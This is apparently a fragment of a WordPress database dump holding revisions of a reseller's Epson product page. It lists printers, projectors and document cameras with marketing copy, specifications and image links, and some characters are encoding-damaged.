WorkForce AL-M320DNÂ </strong></h4><br><br>\n<img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-WorkForce-AL-M320DN-.jpg\" alt=\"\" width=\"254\" height=\"296\" /><br>\nThe Workforce AL-M320DN delivers absolute performance and reliability despite their compact size. Equipped with network printing capabilities and blazing fast performance to support ultra-high volume printing, these printers are built for the most demanding office environments. Further boost productivity with the free fleet management software, Epson Device Admin, to organise and monitor printers remotely.\n<ul>\n 	<li>1200 x 1200 dpi</li>\n 	<li>Print speed up to 35ppm</li>\n 	<li>Auto-Duplex</li>\n 	<li>Ethernet &amp; Epson iPrint</li>\n 	<li>2 optional paper cassette tray</li>\n</ul>[maxbutton id=\"12\" ]<h4><strong>Epson WorkForce AL-M8100DNÂ </strong></h4><br><br>\n<img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-WorkForce-AL-M8100DN-.png\" alt=\"\" width=\"256\" height=\"144\" /><br><br>\nUnleash remarkable efficiency to your workflow. Powered by a 600Mhz dual core processor, the WorkForce AL-8100DN delivers quality A3 and A4 prints with swift speeds of up to 40ppm and is packed with 1GB RAM for faster processing of multiple print jobs.\n<ul>\n 	<li>1200 x 1200 dpi</li>\n 	<li>Print speed up to 40 ppm</li>\n 	<li>Epson iPrint</li>\n 	<li>Ethernet</li>\n 	<li>4 optional cassette trays</li>\n</ul>[maxbutton id=\"12\" ]		\n			<h2>POS PRINTER</h2>		\n		<h4 style=\"text-align: center;\"><strong>Epson TM-H6000IVÂ </strong></h4><p><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-TM-H6000IV.png\" alt=\"\" width=\"224\" height=\"125\" /></p><p>The Epson multifunction POS printer TM-H6000IV, features everything retailers need from fast receipt printing and check processing to best-in-class reliability.</p><ul><li>Thermal &amp; Dot Output</li><li>Speed: Up to 300mm/sec</li><li>Check printing</li><li>Bi-directional printing</li><li>SupportsÂ slip printing, validation and endorsement print</li></ul><center>[maxbutton id=\"12\" ]</center><h4 style=\"text-align: center;\"><strong>Epson TM-T88V-iÂ </strong>\n<img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-TM-T88V-i.png\" alt=\"\" width=\"243\" height=\"137\" /></h4>\nCreate a world of possibilities with TM-T88V-i Intelligent Solution. Equipped with cloud and web-capabilities, you\'ll have access to a variety of intelligent functions delivered by a compact, space-saving printer that fits easily into your business.\n<ul>\n 	<li>Printing speed of up to 300mm/second</li>\n 	<li>20 million lines for printer mechanism</li>\n 	<li>Up to 2 million for auto-cutter</li>\n 	<li>LAN, Serial, USB 2.0 (Type A) x 4</li>\n 	<li>Control peripherals easily</li>\n</ul>\n<center>[maxbutton id=\"12\" ]</center><h4 style=\"text-align: center;\"><strong>Epson TM-T70IIÂ </strong><br /><br /><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-TM-T70II.png\" alt=\"\" width=\"254\" height=\"143\" /><br /><br /></h4><p>The Epson\'s TM-T70II is the smallest in class receipt printer with a full frontal operation.</p><ul><li>Print method: Thermal line printing</li><li>Width: 79Â Â±Â 0.5 mm</li><li>Print Speed: Up to 250 mm/ sec</li><li>Auto-cutter feature</li></ul><center>[maxbutton id=\"12\" ]</center>		\n			<h3>PHOTO PRINTER</h3>		\n		<p><strong>Epson L1800 A3 Photo Ink Tank Printer</strong></p><p><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-L1800-Printer.png\" alt=\"\" width=\"550\" height=\"310\" /></p><p>In creating the next wave of printing innovation, Epson introduces the worlds first truly affordable 6-colour A3+ original ink tank system printer.</p><ul><li>Yield of up to 1,500 4R photos</li><li>Print speed up to 15ppm</li><li>High-yield ink bottles</li><li>1-year warranty or 9,000 prints</li></ul>[maxbutton id=\"12\" ]<p><strong>Epson L850 PrinterÂ </strong><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-L850-Printer.png\" alt=\"\" width=\"261\" height=\"147\" /></p><p>Imaging enthusiasts and professionals can look forward to the 6-colour ink tank system, presenting vibrant borderless prints and unrivalled performance at a remarkably low cost through this 3-in-1 photo printer.</p><ul><li>High-yield ink bottles</li><li>2.7 colour LCD screen</li><li>Direct printing via memory card slot, USB port and PictBridge</li><li>CD/DVD printing</li><li>Warranty of 1 year or 3,000 photo prints, whichever comes first</li></ul>[maxbutton id=\"12\" ]<p><strong>Epson L805 PrinterÂ </strong><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-L805-Printer-.png\" alt=\"\" width=\"240\" height=\"135\" /></p><p>The L805s integrated Wi-Fi support and expanded colour gamut of 6 inks brings you ease of printing from your mobile devices over a wireless network so you can print low-cost, lab-quality photos at your convenience.</p><ul><li>Yield of Up to 1,800 4R photos</li><li>Lowest Printing Costs</li><li>Wi-Fi &amp; Epson iPrint</li><li>CD/DVD Printing Capability</li><li>1 year or 3,000 prints warranty</li></ul>[maxbutton id=\"12\" ]		\n			<h3>Projectors for Work</h3>		\n			<h3>CORPORATE AND EDUCATIONÂ </h3>		\n		<p><strong>Epson EB-2055</strong></p><p><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-EB-2055.png\" alt=\"\" width=\"245\" height=\"163\" /></p><p>Leave the lights on and take control whether in the meeting room or classroom. Epsonâ€™s EB-2055 projector is engineered to shine outstandingly even in well-lit environments to enrich your presentation experience. Your brilliant presentations are made even better and more convenient with the new gesture-control function that allows you to navigate between your slides without the use of a peripheral device.</p><ul><li>XGA Resolution</li><li>White and Colour Light Output at 5,000 lumens</li><li>Gesture Presenter</li><li>Multi-PC Projection</li><li>2 x HDMI</li><li>Split Screen</li></ul>[maxbutton id=\"12\" ]<p><strong>Epson EB-2142W</strong>Â <img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-EB-2142W.jpg\" alt=\"\" width=\"245\" height=\"138\" /></p><p>Enjoy success and unparalleled performance with Epson business projectors. Fully maximise your office space and experience a variety of connectivity options for your ultimate convenience. Along with long lamp-life and maintenance cycles, potential for saving costs and improving energy efficiency is now made possible for you. Every component is skillfully innovated with attention to detail in mind, including the integrated 3LCD technology that will provide you with stunning colour brightness for quality images.</p><ul><li>White and Colour Brightness at 4,200lm</li><li>WXGA Resolution</li><li>12000 hours lamp life in eco-mode</li><li>MHL-enabled</li><li>Multi-PC Projection</li><li>Horizontal Keystone Slider</li><li>Miracast<sup>Â®</sup></li></ul>[maxbutton id=\"12\" ]<br /><p><strong>Epson EB-L500WÂ </strong><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-EB-L500W.jpg\" alt=\"\" width=\"251\" height=\"142\" /></p><p>The compact, affordable EB-L500W laser projector delivers powerful performance for education and business applications. Get bright, vivid images with 5,000 lumens colour/white brightness. This wireless projector also offers WXGA resolution and Full HD support. Featuring breakthrough laser technology, it delivers a laser light source of up to 20,000 hours. And, it offers virtually maintenance-free operation for the life of the optical engine. Plus, it features a Dynamic contrast ratio of up to 2,500,000:1. It also includes wireless networking with enterprise-level security, and advanced installation features.</p><ul><li>5,000 lumens colour/white brightness<sup>Â </sup></li><li>Colourful WXGA; up to 2,500,000:1 Dynamic contrast ratio</li><li>Laser light source of up to 20,000 hours</li><li>Virtually maintenance-free for optical engine life</li></ul>[maxbutton id=\"12\" ]		\n			<h3>ACCENT LIGHTING LASER PROJECTORS</h3>		\n		<p><strong>Epson LightScene EV-105</strong></p><p><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-LightScene-EV-105.jpg\" alt=\"\" width=\"263\" height=\"176\" /></p><p>Create stunning visual displays and immersive environments with the LightScene EV-105, the cutting-edge digital signage solution from Epson. A convergence of lighting and display technology, LightScene laser projectors captivate audiences by simultaneously illuminating and projecting on virtually any surface or material, unleashing dynamic, experiential content for digital art, commercial signage and dÃ©cor applications. Designed to blend in discreetly to any setting â€” from retail, hospitality and event spaces to showrooms and museums â€” LightScene EV-105 offers a sleek, black spotlight design, with an array of configuration, mounting and programming options.</p><ul><li>Laser projector for digital art and signage</li><li>Seamlessly blends into virtually any environment</li><li>Up to 20,000 hours of virtually maintenance-free operation</li><li>360-degree mounting: floors, walls or ceilings</li><li>Remote management and control tools</li><li>Best New Award Overall</li></ul>[maxbutton id=\"12\" ]<h3>ULTRA PORTABLE</h3><p><strong>Epson EB-1785WÂ </strong></p><p><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-EB-1785W.png\" alt=\"\" width=\"236\" height=\"133\" /></p><p>The Epson EB-1785W packs superior imaging quality along with a suite of connectivity and usability features into a body weighing only 1.83kg and 44mm slim. Wirelessly connect your smart devices to the projector via Wi-Fi, Miracast, iProjection application or NFC technology. The EB-1785W comes with Gesture Presenter technology, which allows you to transit between slides without a clicker. Lastly, with Epson\'s 3LCD technology that delivers up to 3 times wider colour gamut and brightness, you can astound audiences anywhere you go.</p><ul><li>White Light Output 3,200 lumens, Colour Light Output 3,200 lumens</li><li>WXGA Resolution</li><li>Real-Time Auto Keystone Correction</li><li>Split Screen Projection</li><li>Hassle-Free Presentation with USB 3-in-1 Display Feature and Epson iProjection</li></ul>[maxbutton id=\"12\" ]		\n			<h3>INTERACTIVE</h3>		\n		<p><strong>Epson EB-536WiÂ </strong></p><p><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-EB-536Wi.png\" alt=\"\" width=\"242\" height=\"136\" /></p><p>Project large screen sizes even at close range and make your presentations larger-than-life with Epson EB-536Wi projector.</p><ul><li>White and Colour Brightness at 3,400lm</li><li>WXGA Resolution</li><li>Multi-PC projection</li><li>HDMI Connectivity</li><li>Pen Interactivity</li></ul>[maxbutton id=\"12\" ]<p><strong>Epson 595Wi/585Wi/575Wi</strong>Â <img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-595Wi.png\" alt=\"\" width=\"276\" height=\"155\" /></p><p>With the finger-touch interactive function and PC-free annotation, you can easily transform any surface into an interactive environment so everyone can throw their ideas on the table.</p><ul><li>WXGA Resolution</li><li>White and Colour Brightness at 3,300lm</li><li>Multi-PC projection</li><li>HDMI Connectivity x2</li></ul>[maxbutton id=\"12\" ]		\n			<h3>HIGH BRIGHTNESS</h3>		\n		<p><strong>Epson EB-L1405UNLÂ </strong></p><p><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/EB-L1405UNL.png\" alt=\"\" width=\"207\" height=\"117\" /></p><p>The Epson EB-L1405U projector is designed to deliver unyielding laser performance, from any position to most surfaces, up to 20,000Â long lasting hours maintenance-free.</p><ul><li>White and Colour Brightness at 8,000lm</li><li>WUXGA (1920 x 1200)</li><li>Edge-blending to create large panoramic images</li><li>Curve and corner wall projection</li><li>HDBaseT</li></ul>[maxbutton id=\"12\" ]<p><strong>Epson EB-G7400UNLÂ </strong></p><p><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-EB-G7400UNL.png\" alt=\"\" width=\"205\" height=\"116\" /></p><p>Epson high brightness EB-G7400U projector presents a new perspective on clarity, durability, and versatility. With the advanced C2Fineâ„¢ and 4K Enhancement Technology, projections are brought to life with vibrant colours in extreme resolution and vividness. Overcome the limitations of space constraints and project large and uncompromised images through the projectorâ€™s astoundingly short throw ratio of 0.35*.</p><p><em>* With optional ELPLX01 zero offset ultra-short throw lens.</em></p><ul><li>High Brightness</li><li>Beyond Full HD Resolution</li><li>Powered Lens</li><li>Portrait Projection</li><li>Flexible Installation</li><li>Edge Blending</li><li>Point Correction</li></ul>[maxbutton id=\"12\" ]<p><strong>Epson EB-Z10000UÂ </strong></p><p><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-EB-Z10000U.png\" alt=\"\" width=\"208\" height=\"117\" /></p><p>Discover a powerful way to impress your audience the EB-Z10000U high brightness business projector gives you stunning, high-definition images with its 3LCD technology.</p><ul><li>White and Colour Brightness at 10,000Â lm</li><li>WUXGA resolution</li><li>High Reliability and Durability</li><li>Suitable for 24/7 usage</li><li>Flexible projection angles and installations</li></ul>[maxbutton id=\"12\" ]<h3>DOCUMENT CAMERAS</h3><p><strong>Document Camera ELPDC21Â </strong><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Document-Camera-ELPDC21.jpg\" alt=\"\" width=\"206\" height=\"137\" /></p><p>Cut through the hassle, and get straight to your presentation. Epsons series of document cameras not only captures details with Full HD resolution, its versatile connectivity also gives you great functionality.</p><ul><li>Pixels: 2MP (1920 x 1080 pixels)</li><li>Camera Sensor: 1/2.7 inch CMOS Sensor</li><li>Resolution: Up to Full HD (1080p)</li><li>Zoom: 10x Digital Zoom, 12x Optical Zoom</li><li>Weight: Approx 3.0kg</li></ul><p>[maxbutton id=\"12\" ]</p>','Epson','','inherit','closed','closed','','1486-revision-v1','','','2019-09-25 17:36:02','2019-09-25 09:36:02','',1486,'https://bintara.com.my/blog/2019/09/25/1486-revision-v1/',0,'revision','',0),(3480,1,'2019-09-26 09:28:39','2019-09-26 01:28:39','<p>As a global technology leader, Epson creates and delivers technology solutions for businesses and consumers, from inkjet printers and digital printing systems to 3LCD projectors, smart glasses, sensing systems and industrial robots. The company is focused on driving innovations and exceeding customer expectations in inkjet, visual communications, wearables and robotics.</p><h2>Printers for Work</h2><p>Epson has the best printers for your business requirements regardless documents, photos, receipts, large-formats, labels, or even apparels.</p>		\n			<h2>BUSINESS INKJET PRINTER</h2>		\n		<h4 style=\"text-align: center;\"><strong>Epson WorkForce Enterprise WF-C17590Â </strong></h4><p><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-WorkForce-Enterprise-WF-C17590.jpg\" alt=\"\" width=\"366\" height=\"207\" /></p><p>Our massive investment in revolutionary technologies enables us to pay attention to every minute detail. PrecisionCoreâ„¢, our next generation, high-density printhead, takes a great leap forward in enterprise printing. Epson WorkForce Enterprise WF-C17590 has arrived, giving you exactly what you need: superior quality, excellent connectivity and prints at lightning fast speed.</p><ul><li>4-in-1 Network MFP: Print | Copy | Scan | Fax</li><li>Ink: DURABrite<sup>TM</sup>Â Pro pigment ink cartridges</li><li>ISO Print Speed: 75 ISO ppm (black/colour) simplex/duplex</li></ul>		\n		<h4 style=\"text-align: center;\">[maxbutton id=\"12\" ]</h4><h4 style=\"text-align: center;\"><strong>Epson WorkForce Pro WF-C5290Â </strong></h4><p><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-WorkForce-Pro-WF-C5290.png\" alt=\"\" width=\"378\" height=\"213\" /></p><p>Enjoy low-cost, reliable printing with Epson WorkForce Pro WF-C5290 business printer. Delivering fast print speeds of up to 24ipm with a first page-out time of just 4.8 seconds, it is built to handle the most demanding print jobs. With a range of printing and connectivity features, this printer is the ideal solution for small workgroups that require hassle-free, low-maintenance and productive-boosting printing.</p><ul><li>High yield ink packs</li><li>High-speed auto-duplex printing</li><li>USB, Ethernet, Wi-Fi, Wi-Fi Direct and NFC</li><li>Epson Connect</li><li>EnergyÂ saving</li></ul><h4 style=\"text-align: center;\">[maxbutton id=\"12\" ]</h4><h4 style=\"text-align: center;\"><strong>Epson WorkForce WF-100Â </strong></h4><p><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-WorkForce-WF-100.png\" alt=\"\" width=\"378\" height=\"213\" /></p><p>Introducing the Epson WorkForce WF-100, a lightweight portable inkjet printer designed for professionals on the go. Battery-operated with integrated wireless capabilities such as Wi-Fi Direct and Epson Connect, you can have quality colour printouts anytime, anywhere.</p><ul><li>Print speed up to 14 ppm</li><li>Epson Connect</li><li>1.44 Colour LCD Panel</li><li>Wi-Fi and Wi-Fi Direct connectivity</li><li>Built-in battery</li></ul>		\n		<h4 style=\"text-align: center;\">[maxbutton id=\"12\" ]</h4><h4 style=\"text-align: center;\"><strong>Epson WorkForce WF-7711</strong></h4>\n<img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-WorkForce-WF-7711.png\" alt=\"\" width=\"304\" height=\"172\" /><br>\nChange the way you print A3+ business documents with the Epson WorkForce WF-7711 printer. Designed for convenience, this smart printer is equipped with a suite of connectivity features, from USB and Ethernet to Wi-Fi Direct and NFC. With PrecisionCore<sup>TM</sup>Â technology, fast printing speed consistently delivers success in every detail.\n<ul>\n 	<li>Print speeds up to 18ipm for black and 10ipm for colour</li>\n 	<li>USB, Ethernet, Wi-Fi, Wi-Fi Direct and NFC</li>\n 	<li>Duplex printing up to A3 size</li>\n 	<li>Epson DURABrite<sup>TM</sup>Â Ultra ink</li>\n 	<li>4.3â€ Colour LCD Touch Panel</li>\n 	<li>Print, Scan, Copy Fax with ADF</li>\n</ul>\n<center>[maxbutton id=\"12\" ]</center>		\n			<h2>INK TANK SYSTEM</h2>		\n		<h4 style=\"text-align: center;\"><strong>Epson EcoTank L3150</strong></h4><p><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-EcoTank-L3150-.jpg\" alt=\"\" width=\"311\" height=\"175\" /></p><p>Save more with Epsonâ€™s economical and multifunctional printing solutions for businessâ€”the EcoTank L3150â€”built to bring down costs, and bring up productivity. The integrated ink tank enables spill-free, error-free refilling with individual bottles that have designated nozzles. Other features include borderless 4R printing and an ultra-high yield of 7,500 coloured and 4,500 black-and-white pages. The EcoTank L3150 also delivers the convenience of wireless connectivity, allowing direct printing from smart devices.</p><ul><li>Compact integrated tank design</li><li>High yield ink bottles</li><li>Spill-free, error-free refilling</li><li>Wi-Fi, Wi-Fi Direct</li><li>Epson Connect (Epson iPrint, Epson Email Print and Remote Print Driver)</li><li>Borderless printing up to 4R</li></ul><center>[maxbutton id=\"12\" ]</center><h4 style=\"text-align: center;\"><strong>Epson L120 PrinterÂ </strong><br /><br /><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-L120-Printer.png\" alt=\"\" width=\"301\" height=\"170\" /></h4><p>The Epson L120 ink tank system printer brings speedy performance with low running costs to all your personal and work projects.</p><ul><li>High-yield ink bottles</li><li>Print speed up to 8.5ipm for black-and-white and 4.5ipm for color</li><li>Compact Size</li><li>Warranty of 2 Years or 20,000 Pages, whichever comes first</li></ul>		\n		[maxbutton id=\"12\" ]<h4 style=\"text-align: center;\"><strong>Epson M1100 Printer</strong></h4><p><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-M1100-Printer-.png\" alt=\"\" width=\"315\" height=\"178\" /></p><p>EfficiencyÂ meets economy with the EcoTank monochrome M1100 printer. Look forward to lower business costs with bottles that provide an ultra-high page yield of up to 6,000 pagesÂ each. Simplify processes with the integrated ink tank that enables spill - and error-free ink refilling, and enjoy laser-quality text that is smudge-proof and water-resistant with the pigment ink.</p><ul><li>Compact integrated tank design</li><li>High-yield pigment ink bottle</li><li>Spill-free, error-free refilling</li><li>Print speed up to 32ppm (15ipm)</li><li>4 years warranty</li></ul>		\n		<center>[maxbutton id=\"12\" ]</center>		\n			<h2>LASER PRINTER</h2>		\n		<h4 style=\"text-align: center;\"><strong>Epson AcuLaser C9300N</strong></h4><br><br>\n<img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-AcuLaser-C9300N.png\" alt=\"\" width=\"313\" height=\"177\" /><br>\nThe Epson AcuLaserâ„¢ C9300N breaks new ground with its class-leading 1200dpi standard resolution for A3 colour laser printing. Together with its fast speed and high reliability, it packs superior performance in a cost efficient design that perfectly complements the needs of demanding workgroups.\n<ul>\n 	<li>1200 x 1200 dpi</li>\n 	<li>Speed: Up to 30ppm</li>\n 	<li>First page out in 8.3 sec or less (mono A4), 9.9 sec (colour A4)</li>\n 	<li>Quality prints with new Epson Technologies</li>\n 	<li>New print job management features</li>\n</ul>[maxbutton id=\"12\" ]<h4 style=\"text-align: center;\">Â <strong>Epson WorkForce AL-M320DNÂ </strong></h4><br><br>\n<img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-WorkForce-AL-M320DN-.jpg\" alt=\"\" width=\"254\" height=\"296\" /><br>\nThe Workforce AL-M320DN delivers absolute performance and reliability despite their compact size. Equipped with network printing capabilities and blazing fast performance to support ultra-high volume printing, these printers are built for the most demanding office environments. Further boost productivity with the free fleet management software, Epson Device Admin, to organise and monitor printers remotely.\n<ul>\n 	<li>1200 x 1200 dpi</li>\n 	<li>Print speed up to 35ppm</li>\n 	<li>Auto-Duplex</li>\n 	<li>Ethernet &amp; Epson iPrint</li>\n 	<li>2 optional paper cassette tray</li>\n</ul>[maxbutton id=\"12\" ]<h4><strong>Epson WorkForce AL-M8100DNÂ </strong></h4><br><br>\n<img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-WorkForce-AL-M8100DN-.png\" alt=\"\" width=\"256\" height=\"144\" /><br><br>\nUnleash remarkable efficiency to your workflow. Powered by a 600Mhz dual core processor, the WorkForce AL-8100DN delivers quality A3 and A4 prints with swift speeds of up to 40ppm and is packed with 1GB RAM for faster processing of multiple print jobs.\n<ul>\n 	<li>1200 x 1200 dpi</li>\n 	<li>Print speed up to 40 ppm</li>\n 	<li>Epson iPrint</li>\n 	<li>Ethernet</li>\n 	<li>4 optional cassette trays</li>\n</ul>[maxbutton id=\"12\" ]		\n			<h2>POS PRINTER</h2>		\n		<h4 style=\"text-align: center;\"><strong>Epson TM-H6000IVÂ </strong></h4><p><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-TM-H6000IV.png\" alt=\"\" width=\"224\" height=\"125\" /></p><p>The Epson multifunction POS printer TM-H6000IV, features everything retailers need from fast receipt printing and check processing to best-in-class reliability.</p><ul><li>Thermal &amp; Dot Output</li><li>Speed: Up to 300mm/sec</li><li>Check printing</li><li>Bi-directional printing</li><li>SupportsÂ slip printing, validation and endorsement print</li></ul><center>[maxbutton id=\"12\" ]</center><h4 style=\"text-align: center;\"><strong>Epson TM-T88V-iÂ </strong>\n<img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-TM-T88V-i.png\" alt=\"\" width=\"243\" height=\"137\" /></h4>\nCreate a world of possibilities with TM-T88V-i Intelligent Solution. Equipped with cloud and web-capabilities, you\'ll have access to a variety of intelligent functions delivered by a compact, space-saving printer that fits easily into your business.\n<ul>\n 	<li>Printing speed of up to 300mm/second</li>\n 	<li>20 million lines for printer mechanism</li>\n 	<li>Up to 2 million for auto-cutter</li>\n 	<li>LAN, Serial, USB 2.0 (Type A) x 4</li>\n 	<li>Control peripherals easily</li>\n</ul>\n<center>[maxbutton id=\"12\" ]</center><h4 style=\"text-align: center;\"><strong>Epson TM-T70IIÂ </strong><br /><br /><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-TM-T70II.png\" alt=\"\" width=\"254\" height=\"143\" /><br /><br /></h4><p>The Epson\'s TM-T70II is the smallest in class receipt printer with a full frontal operation.</p><ul><li>Print method: Thermal line printing</li><li>Width: 79Â Â±Â 0.5 mm</li><li>Print Speed: Up to 250 mm/ sec</li><li>Auto-cutter feature</li></ul><center>[maxbutton id=\"12\" ]</center>		\n			<h2>PHOTO PRINTER</h2>		\n		<h4 style=\"text-align: center;\"><strong>Epson L1800 A3 Photo Ink Tank Printer</strong></h4><br><br>\n<img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-L1800-Printer.png\" alt=\"\" width=\"241\" height=\"175\" /><br>\nIn creating the next wave of printing innovation, Epson introduces the worlds first truly affordable 6-colour A3+ original ink tank system printer.\n<ul>\n 	<li>Yield of up to 1,500 4R photos</li>\n 	<li>Print speed up to 15ppm</li>\n 	<li>High-yield ink bottles</li>\n 	<li>1-year warranty or 9,000 prints</li>\n</ul>\n[maxbutton id=\"12\" ]<h4 style=\"text-align: center;\"><strong>Epson L850 PrinterÂ </strong><br><br><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-L850-Printer.png\" alt=\"\" width=\"261\" height=\"147\" /></h4><br>\nImaging enthusiasts and professionals can look forward to the 6-colour ink tank system, presenting vibrant borderless prints and unrivalled performance at a remarkably low cost through this 3-in-1 photo printer.\n<ul>\n 	<li>High-yield ink bottles</li>\n 	<li>2.7 colour LCD screen</li>\n 	<li>Direct printing via memory card slot, USB port and PictBridge</li>\n 	<li>CD/DVD printing</li>\n 	<li>Warranty of 1 year or 3,000 photo prints, whichever comes first</li>\n</ul>\n[maxbutton id=\"12\" ]<h4 style=\"text-align: center;\"><strong>Epson L805 PrinterÂ </strong><br><br><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-L805-Printer-.png\" alt=\"\" width=\"240\" height=\"135\" /></h4><br>\nThe L805s integrated Wi-Fi support and expanded colour gamut of 6 inks brings you ease of printing from your mobile devices over a wireless network so you can print low-cost, lab-quality photos at your convenience.\n<ul>\n 	<li>Yield of Up to 1,800 4R photos</li>\n 	<li>Lowest Printing Costs</li>\n 	<li>Wi-Fi &amp; Epson iPrint</li>\n 	<li>CD/DVD Printing Capability</li>\n 	<li>1 year or 3,000 prints warranty</li>\n</ul>\n[maxbutton id=\"12\" ]		\n			<h3>Projectors for Work</h3>		\n			<h3>CORPORATE AND EDUCATIONÂ </h3>		\n		<p><strong>Epson EB-2055</strong></p><p><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-EB-2055.png\" alt=\"\" width=\"245\" height=\"163\" /></p><p>Leave the lights on and take control whether in the meeting room or classroom. Epsonâ€™s EB-2055 projector is engineered to shine outstandingly even in well-lit environments to enrich your presentation experience. Your brilliant presentations are made even better and more convenient with the new gesture-control function that allows you to navigate between your slides without the use of a peripheral device.</p><ul><li>XGA Resolution</li><li>White and Colour Light Output at 5,000 lumens</li><li>Gesture Presenter</li><li>Multi-PC Projection</li><li>2 x HDMI</li><li>Split Screen</li></ul>[maxbutton id=\"12\" ]<p><strong>Epson EB-2142W</strong>Â <img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-EB-2142W.jpg\" alt=\"\" width=\"245\" height=\"138\" /></p><p>Enjoy success and unparalleled performance with Epson business projectors. Fully maximise your office space and experience a variety of connectivity options for your ultimate convenience. Along with long lamp-life and maintenance cycles, potential for saving costs and improving energy efficiency is now made possible for you. Every component is skillfully innovated with attention to detail in mind, including the integrated 3LCD technology that will provide you with stunning colour brightness for quality images.</p><ul><li>White and Colour Brightness at 4,200lm</li><li>WXGA Resolution</li><li>12000 hours lamp life in eco-mode</li><li>MHL-enabled</li><li>Multi-PC Projection</li><li>Horizontal Keystone Slider</li><li>Miracast<sup>Â®</sup></li></ul>[maxbutton id=\"12\" ]<br /><p><strong>Epson EB-L500WÂ </strong><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-EB-L500W.jpg\" alt=\"\" width=\"251\" height=\"142\" /></p><p>The compact, affordable EB-L500W laser projector delivers powerful performance for education and business applications. Get bright, vivid images with 5,000 lumens colour/white brightness. This wireless projector also offers WXGA resolution and Full HD support. Featuring breakthrough laser technology, it delivers a laser light source of up to 20,000 hours. And, it offers virtually maintenance-free operation for the life of the optical engine. Plus, it features a Dynamic contrast ratio of up to 2,500,000:1. It also includes wireless networking with enterprise-level security, and advanced installation features.</p><ul><li>5,000 lumens colour/white brightness<sup>Â </sup></li><li>Colourful WXGA; up to 2,500,000:1 Dynamic contrast ratio</li><li>Laser light source of up to 20,000 hours</li><li>Virtually maintenance-free for optical engine life</li></ul>[maxbutton id=\"12\" ]		\n			<h3>ACCENT LIGHTING LASER PROJECTORS</h3>		\n		<p><strong>Epson LightScene EV-105</strong></p><p><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-LightScene-EV-105.jpg\" alt=\"\" width=\"263\" height=\"176\" /></p><p>Create stunning visual displays and immersive environments with the LightScene EV-105, the cutting-edge digital signage solution from Epson. A convergence of lighting and display technology, LightScene laser projectors captivate audiences by simultaneously illuminating and projecting on virtually any surface or material, unleashing dynamic, experiential content for digital art, commercial signage and dÃ©cor applications. Designed to blend in discreetly to any setting â€” from retail, hospitality and event spaces to showrooms and museums â€” LightScene EV-105 offers a sleek, black spotlight design, with an array of configuration, mounting and programming options.</p><ul><li>Laser projector for digital art and signage</li><li>Seamlessly blends into virtually any environment</li><li>Up to 20,000 hours of virtually maintenance-free operation</li><li>360-degree mounting: floors, walls or ceilings</li><li>Remote management and control tools</li><li>Best New Award Overall</li></ul>[maxbutton id=\"12\" ]<h3>ULTRA PORTABLE</h3><p><strong>Epson EB-1785WÂ </strong></p><p><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-EB-1785W.png\" alt=\"\" width=\"236\" height=\"133\" /></p><p>The Epson EB-1785W packs superior imaging quality along with a suite of connectivity and usability features into a body weighing only 1.83kg and 44mm slim. Wirelessly connect your smart devices to the projector via Wi-Fi, Miracast, iProjection application or NFC technology. The EB-1785W comes with Gesture Presenter technology, which allows you to transit between slides without a clicker. Lastly, with Epson\'s 3LCD technology that delivers up to 3 times wider colour gamut and brightness, you can astound audiences anywhere you go.</p><ul><li>White Light Output 3,200 lumens, Colour Light Output 3,200 lumens</li><li>WXGA Resolution</li><li>Real-Time Auto Keystone Correction</li><li>Split Screen Projection</li><li>Hassle-Free Presentation with USB 3-in-1 Display Feature and Epson iProjection</li></ul>[maxbutton id=\"12\" ]		\n			<h3>INTERACTIVE</h3>		\n		<p><strong>Epson EB-536WiÂ </strong></p><p><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-EB-536Wi.png\" alt=\"\" width=\"242\" height=\"136\" /></p><p>Project large screen sizes even at close range and make your presentations larger-than-life with Epson EB-536Wi projector.</p><ul><li>White and Colour Brightness at 3,400lm</li><li>WXGA Resolution</li><li>Multi-PC projection</li><li>HDMI Connectivity</li><li>Pen Interactivity</li></ul>[maxbutton id=\"12\" ]<p><strong>Epson 595Wi/585Wi/575Wi</strong>Â <img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-595Wi.png\" alt=\"\" width=\"276\" height=\"155\" /></p><p>With the finger-touch interactive function and PC-free annotation, you can easily transform any surface into an interactive environment so everyone can throw their ideas on the table.</p><ul><li>WXGA 